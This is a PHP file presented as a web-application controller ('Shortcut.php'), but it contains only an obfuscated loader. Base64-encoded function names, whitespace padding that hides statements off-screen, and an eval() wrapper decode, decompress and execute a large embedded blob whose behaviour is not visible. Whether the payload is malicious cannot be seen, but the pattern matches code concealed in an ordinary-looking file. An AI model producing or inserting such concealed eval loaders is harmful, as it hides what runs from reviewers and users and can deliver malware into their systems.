<?php 
        $__='printf';$_='Loading donjo-app/controllers/Shortcut.php';
        











































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































                                                                                                                                                                                                                     $________;
